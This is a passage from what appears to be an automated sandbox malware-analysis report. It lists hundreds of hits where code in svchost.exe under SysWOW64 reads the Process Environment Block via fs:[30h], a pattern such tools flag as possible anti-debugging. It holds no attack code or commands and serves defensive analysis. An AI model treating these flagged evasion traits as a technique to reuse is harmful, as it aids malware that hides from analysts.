                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03229303 mov eax, dword ptr fs:[00000030h]2_2_03229303
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EF30A mov eax, dword ptr fs:[00000030h]2_2_032EF30A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B330C mov eax, dword ptr fs:[00000030h]2_2_032B330C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B330C mov eax, dword ptr fs:[00000030h]2_2_032B330C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B330C mov eax, dword ptr fs:[00000030h]2_2_032B330C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B330C mov eax, dword ptr fs:[00000030h]2_2_032B330C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E310 mov eax, dword ptr fs:[00000030h]2_2_0324E310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E310 mov eax, dword ptr fs:[00000030h]2_2_0324E310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E310 mov eax, dword ptr fs:[00000030h]2_2_0324E310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326631F mov eax, dword ptr fs:[00000030h]2_2_0326631F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323B360 mov eax, dword ptr fs:[00000030h]2_2_0323B360
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323B360 mov eax, dword ptr fs:[00000030h]2_2_0323B360
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323B360 mov eax, dword ptr fs:[00000030h]2_2_0323B360
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323B360 mov eax, dword ptr fs:[00000030h]2_2_0323B360
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323B360 mov eax, dword ptr fs:[00000030h]2_2_0323B360
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323B360 mov eax, dword ptr fs:[00000030h]2_2_0323B360
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E363 mov eax, dword ptr fs:[00000030h]2_2_0326E363
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E363 mov eax, dword ptr fs:[00000030h]2_2_0326E363
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E363 mov eax, dword ptr fs:[00000030h]2_2_0326E363
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E363 mov eax, dword ptr fs:[00000030h]2_2_0326E363
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E363 mov eax, dword ptr fs:[00000030h]2_2_0326E363
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E363 mov eax, dword ptr fs:[00000030h]2_2_0326E363
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E363 mov eax, dword ptr fs:[00000030h]2_2_0326E363
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E363 mov eax, dword ptr fs:[00000030h]2_2_0326E363
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE372 mov eax, dword ptr fs:[00000030h]2_2_032AE372
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE372 mov eax, dword ptr fs:[00000030h]2_2_032AE372
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE372 mov eax, dword ptr fs:[00000030h]2_2_032AE372
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE372 mov eax, dword ptr fs:[00000030h]2_2_032AE372
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B0371 mov eax, dword ptr fs:[00000030h]2_2_032B0371
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B0371 mov eax, dword ptr fs:[00000030h]2_2_032B0371
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325237A mov eax, dword ptr fs:[00000030h]2_2_0325237A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03228347 mov eax, dword ptr fs:[00000030h]2_2_03228347
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03228347 mov eax, dword ptr fs:[00000030h]2_2_03228347
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03228347 mov eax, dword ptr fs:[00000030h]2_2_03228347
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A350 mov eax, dword ptr fs:[00000030h]2_2_0326A350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032393A6 mov eax, dword ptr fs:[00000030h]2_2_032393A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032393A6 mov eax, dword ptr fs:[00000030h]2_2_032393A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AC3B0 mov eax, dword ptr fs:[00000030h]2_2_032AC3B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03231380 mov eax, dword ptr fs:[00000030h]2_2_03231380
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03231380 mov eax, dword ptr fs:[00000030h]2_2_03231380
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03231380 mov eax, dword ptr fs:[00000030h]2_2_03231380
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03231380 mov eax, dword ptr fs:[00000030h]2_2_03231380
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03231380 mov eax, dword ptr fs:[00000030h]2_2_03231380
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324F380 mov eax, dword ptr fs:[00000030h]2_2_0324F380
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324F380 mov eax, dword ptr fs:[00000030h]2_2_0324F380
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324F380 mov eax, dword ptr fs:[00000030h]2_2_0324F380
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324F380 mov eax, dword ptr fs:[00000030h]2_2_0324F380
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324F380 mov eax, dword ptr fs:[00000030h]2_2_0324F380
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324F380 mov eax, dword ptr fs:[00000030h]2_2_0324F380
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EF38A mov eax, dword ptr fs:[00000030h]2_2_032EF38A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325A390 mov eax, dword ptr fs:[00000030h]2_2_0325A390
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325A390 mov eax, dword ptr fs:[00000030h]2_2_0325A390
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325A390 mov eax, dword ptr fs:[00000030h]2_2_0325A390
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E3C0 mov eax, dword ptr fs:[00000030h]2_2_0322E3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E3C0 mov eax, dword ptr fs:[00000030h]2_2_0322E3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E3C0 mov eax, dword ptr fs:[00000030h]2_2_0322E3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C3C7 mov eax, dword ptr fs:[00000030h]2_2_0322C3C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032363CB mov eax, dword ptr fs:[00000030h]2_2_032363CB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032633D0 mov eax, dword ptr fs:[00000030h]2_2_032633D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032643D0 mov ecx, dword ptr fs:[00000030h]2_2_032643D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BE3DD mov eax, dword ptr fs:[00000030h]2_2_032BE3DD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B43D5 mov eax, dword ptr fs:[00000030h]2_2_032B43D5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B0227 mov eax, dword ptr fs:[00000030h]2_2_032B0227
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B0227 mov eax, dword ptr fs:[00000030h]2_2_032B0227
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B0227 mov eax, dword ptr fs:[00000030h]2_2_032B0227
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A22B mov eax, dword ptr fs:[00000030h]2_2_0326A22B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A22B mov eax, dword ptr fs:[00000030h]2_2_0326A22B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A22B mov eax, dword ptr fs:[00000030h]2_2_0326A22B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03250230 mov ecx, dword ptr fs:[00000030h]2_2_03250230
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A200 mov eax, dword ptr fs:[00000030h]2_2_0322A200
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322821B mov eax, dword ptr fs:[00000030h]2_2_0322821B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BB214 mov eax, dword ptr fs:[00000030h]2_2_032BB214
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BB214 mov eax, dword ptr fs:[00000030h]2_2_032BB214
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322B273 mov eax, dword ptr fs:[00000030h]2_2_0322B273
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322B273 mov eax, dword ptr fs:[00000030h]2_2_0322B273
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322B273 mov eax, dword ptr fs:[00000030h]2_2_0322B273
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C327E mov eax, dword ptr fs:[00000030h]2_2_032C327E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C327E mov eax, dword ptr fs:[00000030h]2_2_032C327E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C327E mov eax, dword ptr fs:[00000030h]2_2_032C327E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C327E mov eax, dword ptr fs:[00000030h]2_2_032C327E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C327E mov eax, dword ptr fs:[00000030h]2_2_032C327E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C327E mov eax, dword ptr fs:[00000030h]2_2_032C327E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032ED270 mov eax, dword ptr fs:[00000030h]2_2_032ED270
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F124C mov eax, dword ptr fs:[00000030h]2_2_032F124C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F124C mov eax, dword ptr fs:[00000030h]2_2_032F124C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F124C mov eax, dword ptr fs:[00000030h]2_2_032F124C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F124C mov eax, dword ptr fs:[00000030h]2_2_032F124C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EF247 mov eax, dword ptr fs:[00000030h]2_2_032EF247
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325F24A mov eax, dword ptr fs:[00000030h]2_2_0325F24A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AD250 mov eax, dword ptr fs:[00000030h]2_2_032AD250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AD250 mov ecx, dword ptr fs:[00000030h]2_2_032AD250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EF2AE mov eax, dword ptr fs:[00000030h]2_2_032EF2AE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F92AB mov eax, dword ptr fs:[00000030h]2_2_032F92AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032542AF mov eax, dword ptr fs:[00000030h]2_2_032542AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032542AF mov eax, dword ptr fs:[00000030h]2_2_032542AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0330B2BC mov eax, dword ptr fs:[00000030h]2_2_0330B2BC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0330B2BC mov eax, dword ptr fs:[00000030h]2_2_0330B2BC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0330B2BC mov eax, dword ptr fs:[00000030h]2_2_0330B2BC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0330B2BC mov eax, dword ptr fs:[00000030h]2_2_0330B2BC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032292AF mov eax, dword ptr fs:[00000030h]2_2_032292AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C2B0 mov ecx, dword ptr fs:[00000030h]2_2_0322C2B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE289 mov eax, dword ptr fs:[00000030h]2_2_032AE289
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03237290 mov eax, dword ptr fs:[00000030h]2_2_03237290
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03237290 mov eax, dword ptr fs:[00000030h]2_2_03237290
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03237290 mov eax, dword ptr fs:[00000030h]2_2_03237290
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032272E0 mov eax, dword ptr fs:[00000030h]2_2_032272E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A2E0 mov eax, dword ptr fs:[00000030h]2_2_0323A2E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A2E0 mov eax, dword ptr fs:[00000030h]2_2_0323A2E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A2E0 mov eax, dword ptr fs:[00000030h]2_2_0323A2E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A2E0 mov eax, dword ptr fs:[00000030h]2_2_0323A2E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A2E0 mov eax, dword ptr fs:[00000030h]2_2_0323A2E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A2E0 mov eax, dword ptr fs:[00000030h]2_2_0323A2E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032382E0 mov eax, dword ptr fs:[00000030h]2_2_032382E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032382E0 mov eax, dword ptr fs:[00000030h]2_2_032382E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032382E0 mov eax, dword ptr fs:[00000030h]2_2_032382E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032382E0 mov eax, dword ptr fs:[00000030h]2_2_032382E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322D2EC mov eax, dword ptr fs:[00000030h]2_2_0322D2EC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322D2EC mov eax, dword ptr fs:[00000030h]2_2_0322D2EC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032402F9 mov eax, dword ptr fs:[00000030h]2_2_032402F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032402F9 mov eax, dword ptr fs:[00000030h]2_2_032402F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032402F9 mov eax, dword ptr fs:[00000030h]2_2_032402F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032402F9 mov eax, dword ptr fs:[00000030h]2_2_032402F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032402F9 mov eax, dword ptr fs:[00000030h]2_2_032402F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032402F9 mov eax, dword ptr fs:[00000030h]2_2_032402F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032402F9 mov eax, dword ptr fs:[00000030h]2_2_032402F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032402F9 mov eax, dword ptr fs:[00000030h]2_2_032402F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032532C5 mov eax, dword ptr fs:[00000030h]2_2_032532C5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032632C0 mov eax, dword ptr fs:[00000030h]2_2_032632C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032632C0 mov eax, dword ptr fs:[00000030h]2_2_032632C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033032C9 mov eax, dword ptr fs:[00000030h]2_2_033032C9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03267128 mov eax, dword ptr fs:[00000030h]2_2_03267128
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03267128 mov eax, dword ptr fs:[00000030h]2_2_03267128
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EF13E mov eax, dword ptr fs:[00000030h]2_2_032EF13E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BA130 mov eax, dword ptr fs:[00000030h]2_2_032BA130
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325510F mov eax, dword ptr fs:[00000030h]2_2_0325510F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325510F mov eax, dword ptr fs:[00000030h]2_2_0325510F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325510F mov eax, dword ptr fs:[00000030h]2_2_0325510F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325510F mov eax, dword ptr fs:[00000030h]2_2_0325510F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325510F mov eax, dword ptr fs:[00000030h]2_2_0325510F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325510F mov eax, dword ptr fs:[00000030h]2_2_0325510F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325510F mov eax, dword ptr fs:[00000030h]2_2_0325510F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325510F mov eax, dword ptr fs:[00000030h]2_2_0325510F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325510F mov eax, dword ptr fs:[00000030h]2_2_0325510F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325510F mov eax, dword ptr fs:[00000030h]2_2_0325510F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325510F mov eax, dword ptr fs:[00000030h]2_2_0325510F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325510F mov eax, dword ptr fs:[00000030h]2_2_0325510F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325510F mov eax, dword ptr fs:[00000030h]2_2_0325510F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323510D mov eax, dword ptr fs:[00000030h]2_2_0323510D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F113 mov eax, dword ptr fs:[00000030h]2_2_0322F113
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F113 mov eax, dword ptr fs:[00000030h]2_2_0322F113
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F113 mov eax, dword ptr fs:[00000030h]2_2_0322F113
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F113 mov eax, dword ptr fs:[00000030h]2_2_0322F113
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F113 mov eax, dword ptr fs:[00000030h]2_2_0322F113
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F113 mov eax, dword ptr fs:[00000030h]2_2_0322F113
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F113 mov eax, dword ptr fs:[00000030h]2_2_0322F113
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F113 mov eax, dword ptr fs:[00000030h]2_2_0322F113
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F113 mov eax, dword ptr fs:[00000030h]2_2_0322F113
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F113 mov eax, dword ptr fs:[00000030h]2_2_0322F113
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F113 mov eax, dword ptr fs:[00000030h]2_2_0322F113
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F113 mov eax, dword ptr fs:[00000030h]2_2_0322F113
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F113 mov eax, dword ptr fs:[00000030h]2_2_0322F113
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F113 mov eax, dword ptr fs:[00000030h]2_2_0322F113
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F113 mov eax, dword ptr fs:[00000030h]2_2_0322F113
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F113 mov eax, dword ptr fs:[00000030h]2_2_0322F113
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F113 mov eax, dword ptr fs:[00000030h]2_2_0322F113
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F113 mov eax, dword ptr fs:[00000030h]2_2_0322F113
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F113 mov eax, dword ptr fs:[00000030h]2_2_0322F113
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F113 mov eax, dword ptr fs:[00000030h]2_2_0322F113
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F113 mov eax, dword ptr fs:[00000030h]2_2_0322F113
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03260118 mov eax, dword ptr fs:[00000030h]2_2_03260118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326716D mov eax, dword ptr fs:[00000030h]2_2_0326716D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0328717A mov eax, dword ptr fs:[00000030h]2_2_0328717A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0328717A mov eax, dword ptr fs:[00000030h]2_2_0328717A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236179 mov eax, dword ptr fs:[00000030h]2_2_03236179
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A147 mov eax, dword ptr fs:[00000030h]2_2_0322A147
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A147 mov eax, dword ptr fs:[00000030h]2_2_0322A147
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A147 mov eax, dword ptr fs:[00000030h]2_2_0322A147
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C314A mov eax, dword ptr fs:[00000030h]2_2_032C314A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C314A mov eax, dword ptr fs:[00000030h]2_2_032C314A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C314A mov eax, dword ptr fs:[00000030h]2_2_032C314A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C314A mov eax, dword ptr fs:[00000030h]2_2_032C314A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03303157 mov eax, dword ptr fs:[00000030h]2_2_03303157
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03303157 mov eax, dword ptr fs:[00000030h]2_2_03303157
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03303157 mov eax, dword ptr fs:[00000030h]2_2_03303157
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03305149 mov eax, dword ptr fs:[00000030h]2_2_03305149
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326415F mov eax, dword ptr fs:[00000030h]2_2_0326415F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E1A4 mov eax, dword ptr fs:[00000030h]2_2_0326E1A4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E1A4 mov eax, dword ptr fs:[00000030h]2_2_0326E1A4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033051B6 mov eax, dword ptr fs:[00000030h]2_2_033051B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032631BE mov eax, dword ptr fs:[00000030h]2_2_032631BE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032631BE mov eax, dword ptr fs:[00000030h]2_2_032631BE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032641BB mov ecx, dword ptr fs:[00000030h]2_2_032641BB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032641BB mov eax, dword ptr fs:[00000030h]2_2_032641BB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032641BB mov eax, dword ptr fs:[00000030h]2_2_032641BB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234180 mov eax, dword ptr fs:[00000030h]2_2_03234180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234180 mov eax, dword ptr fs:[00000030h]2_2_03234180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234180 mov eax, dword ptr fs:[00000030h]2_2_03234180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03259194 mov eax, dword ptr fs:[00000030h]2_2_03259194
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03271190 mov eax, dword ptr fs:[00000030h]2_2_03271190
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03271190 mov eax, dword ptr fs:[00000030h]2_2_03271190
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A1E3 mov eax, dword ptr fs:[00000030h]2_2_0323A1E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A1E3 mov eax, dword ptr fs:[00000030h]2_2_0323A1E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A1E3 mov eax, dword ptr fs:[00000030h]2_2_0323A1E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A1E3 mov eax, dword ptr fs:[00000030h]2_2_0323A1E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A1E3 mov eax, dword ptr fs:[00000030h]2_2_0323A1E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F81EE mov eax, dword ptr fs:[00000030h]2_2_032F81EE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F81EE mov eax, dword ptr fs:[00000030h]2_2_032F81EE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325B1E0 mov eax, dword ptr fs:[00000030h]2_2_0325B1E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325B1E0 mov eax, dword ptr fs:[00000030h]2_2_0325B1E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325B1E0 mov eax, dword ptr fs:[00000030h]2_2_0325B1E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325B1E0 mov eax, dword ptr fs:[00000030h]2_2_0325B1E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325B1E0 mov eax, dword ptr fs:[00000030h]2_2_0325B1E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325B1E0 mov eax, dword ptr fs:[00000030h]2_2_0325B1E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325B1E0 mov eax, dword ptr fs:[00000030h]2_2_0325B1E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032391E5 mov eax, dword ptr fs:[00000030h]2_2_032391E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032391E5 mov eax, dword ptr fs:[00000030h]2_2_032391E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032281EB mov eax, dword ptr fs:[00000030h]2_2_032281EB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032291F0 mov eax, dword ptr fs:[00000030h]2_2_032291F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032291F0 mov eax, dword ptr fs:[00000030h]2_2_032291F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032401F1 mov eax, dword ptr fs:[00000030h]2_2_032401F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032401F1 mov eax, dword ptr fs:[00000030h]2_2_032401F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032401F1 mov eax, dword ptr fs:[00000030h]2_2_032401F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325F1F0 mov eax, dword ptr fs:[00000030h]2_2_0325F1F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325F1F0 mov eax, dword ptr fs:[00000030h]2_2_0325F1F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032401C0 mov eax, dword ptr fs:[00000030h]2_2_032401C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032401C0 mov eax, dword ptr fs:[00000030h]2_2_032401C0
